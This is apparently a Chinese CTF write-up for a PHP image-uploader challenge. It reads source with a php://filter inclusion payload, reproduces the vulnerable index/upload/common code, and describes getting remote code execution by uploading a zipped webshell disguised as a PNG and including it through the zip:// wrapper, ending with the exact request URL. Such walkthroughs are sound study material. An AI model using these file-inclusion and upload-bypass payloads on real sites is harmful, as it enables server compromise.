http://www.bmzclub.cn/challenges#pimps
疑似文件包含点,尝试伪协议读取源码
/?op=php://filter/convert.base64-encode/resource=index
index.php
<?php
error_reporting(0);
define('FROM_INDEX', 1);
$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
die('Try it again and I will kill you! I fucking hate hackers! Pandadmin.');
ob_start('ob_gzhandler');
function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Panduploader :: <?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
<div id="header">
<center><a href="?op=home" class="logo"><img src="images/logo.png" alt=""></a></center>
</div>
<div id="body">
<?php
}
function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}
function page_bottom() {
?>
</div>
<center>
<div id="footer">
<div>
<p>
<span>2016 © 1337 Pandas Corporation.</span> All rights reserved.
</p>
</div>
</div>
</center>
</body>
</html><?php
ob_end_flush();
}
register_shutdown_function('page_bottom');
page_top($op);
if(!(include $op . '.php'))
fatal('no such page');
?>upload.php
<?php
include 'common.php';
if(isset($_POST['submit']) && isset($_FILES['image'])) {
$fn = $_FILES['image']['tmp_name'];
$ft = $_FILES['image']['type'];
if(!is_uploaded_file($fn)) {
fatal('uploaded file corrupted');
}
$array = array('image/png');
if(!in_array($ft,$array)){
fatal("Sorry, only PNG files are allowed.");
}
$imagekey = create_image_key();
move_uploaded_file($fn, "uploads/$imagekey.png");
header("Location: ?op=show&imagekey=$imagekey");
} else {
?>
<center>
<div class="article">
<h2>Upload your own png file</h2>
<form enctype="multipart/form-data" action="?op=upload" method="POST">
<label for="image">Image file (max <?=MAX_IM_SIZE;?>x<?=MAX_IM_SIZE;?>): </label>
<input type="file" id="image" name="image" />
<br />
<input type="submit" name="submit" value="Upload!" />
</form>
</div>
</center>
<?php
}
?>common.php
<?php
if(!defined('FROM_INDEX')) die();
define('MAX_IM_SIZE', 100);
function create_image_key() {
return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand());
}
function load_image($imagekey) {
if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) {
fatal('Invalid image key.');
}
$im = imagecreatefrompng("uploads/{$imagekey}.png");
if(!$im) {
fatal('Failed to load image.');
}
return $im;
}
?>home.php
<?php
include 'common.php';
?>
<center>
<div class="article">
<h2>Welcome to Pandauploader!</h2>
<p>
Pandauploader let you upload PNG image files and store it! Have fun with the pandas all for free!<br/>
</p>
<p>
Get started by <a href="?op=upload">uploading a picture</a>
</p>
</div>
</center>审计源码,有包含点,但是控制了后缀,只能包含php文件,有上传点,上传只验证content-type即可上传,但是$imagekey.png限制了文件名为png。没有限制上传文件的内容,包含点可以使用zip://伪协议。zip://可以动态的解压压缩文件,并且可以访问其中的压缩文件。最重要的是不需要指定文件的后缀名,任何文件后缀都行,只要是压缩文件的文件内容格式能解压并访问
讲shell压缩,然后修改后缀为png后者直接上传zip抓包修改content-type
zip://[上传的压缩包路径]%23[压缩文件名称]
/?op=zip://uploads/7f67a5c01bf194128e1a7fe0930a85894b62590f.png%23shell
